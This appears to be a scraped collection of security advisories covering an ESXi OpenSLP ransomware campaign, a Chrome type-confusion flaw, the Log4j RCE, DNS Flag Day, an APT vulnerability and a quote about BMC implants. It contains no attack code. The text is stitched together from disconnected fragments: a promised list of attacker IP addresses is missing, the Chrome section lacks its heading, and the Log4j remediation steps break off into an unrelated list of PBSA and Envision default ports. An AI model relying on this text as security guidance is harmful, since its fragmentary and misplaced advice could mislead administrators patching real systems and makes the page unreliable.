There are reports of an ongoing ransomware campaign actively exploiting a vulnerability (CVE-2021-21974) in unpatched VMware ESXi servers.
Successful exploitation of the vulnerability could allow an attacker to perform remote code execution by triggering the heap-overflow issue in OpenSLP service.
The following versions of the products are affected by the aforementioned vulnerability:
• ESXi versions 7.x earlier than ESXi70U1c-17325551
• ESXi versions 6.7.x earlier than ESXi670-202102401-SG
• ESXi versions 6.5.x earlier than ESXi650-202102101-SG
Users and administrators of affected product versions are advised to upgrade to the latest versions immediately. As a precaution, a full system scan should also be performed to detect any signs of compromise. Users and administrators are also advised to assess if the ransomware campaign-targeted port 427 can be disabled without disrupting operations.
Users and administrators may also wish to configure their firewall rules to block any connections to the following IP addresses purportedly carrying out the attacks:
Type confusion refers to coding bugs during which an application initialises data execution operations using input of a specific “type” but is tricked into treating the input as a different “type”. This leads to logical errors in the application’s memory, which may allow an attacker to run unrestricted malicious codes inside an application.
No further technical details about the bug have been published by Google.
Google Chrome users on Windows, Mac and Linux are advised to upgrade to Chrome 99.0.4844.84 immediately by going into Chrome menu > Help > About Google Chrome, while Android users may refer to the Google Play Store for Chrome 99 (99.0.4844.88) version.
Apache Log4j has a serious unauthenticated Remote Code Execution (RCE) vulnerability which was just disclosed. The exploit code for this has also been released, and the vulnerability is actively exploited in the wild. By crafting a special string that is passed to the application/service log via Log4j, attackers can execute arbitrary code loaded from remote servers. This can potentially lead to a complete compromise of the server.
What versions are vulnerable?
Any software using Apache Log4j (as a component) version between 2.0 and 2.14.1, inclusive.
What do I need to do?
A. Servers running custom Java application/services
The default http port for the PBSA service is 9000.
The default https port for the PBSA service is 9143.
The default https port for the PBSA data collector is 9343.
The default port for the PBSA MonetDB is 9200.
The default port for the Envision Tomcat-8 server is 9080.
The default https port for Envision is 9443
The default port for the PBSA MongoDB is 9700.
Domain Name System (DNS) infrastructure operators and Internet service providers are taking part in the first DNS Flag Day  on 1 February 2019. This is a global initiative to promote the use of Extension Mechanism Protocol for DNS (EDNS)  where participants, software and service providers such as Google and Cloudflare, are going to remove non-standard DNS workarounds.
Authoritative nameservers that bypass and do not support the EDNS protocol and those with proprietary implementations of the DNS protocol, e.g. legacy load balancing appliances.
Internet users might experience slowness or inaccessibility issues when interacting with domains whose authoritative nameservers are affected, such as accessing websites or sending emails.
A vulnerability (CVE-2019-3462) in the Linux Advanced Package Tool (APT) has been discovered. Successful exploitation of the vulnerability could result in arbitrary code execution with access to privileged administrator “root” on affected Linux systems. APT is a widely used utility that handles installation, update, upgrade and removal of software across many Linux operating system distributions. This vulnerability has been given a Common Vulnerability Score System version 3 severity base score of 8.1 out of 10.
APT versions 1.4.8 and older.
Successful exploitation of this vulnerability could lead to a full compromise of a user’s machine, allowing an attacker to perform malicious activities such as unauthorised installation of programs, creation of rogue administrator accounts and alteration of data.
Affected users and system administrators of Debian, Ubuntu, and other Linux distributions are advised to download and install the security updates immediately.
“Crucially, because the BMC has the ability to install the operating system, it can disrupt the process that boots the operating system – and fetch potentially malicious implant code, maybe even over the Internet.”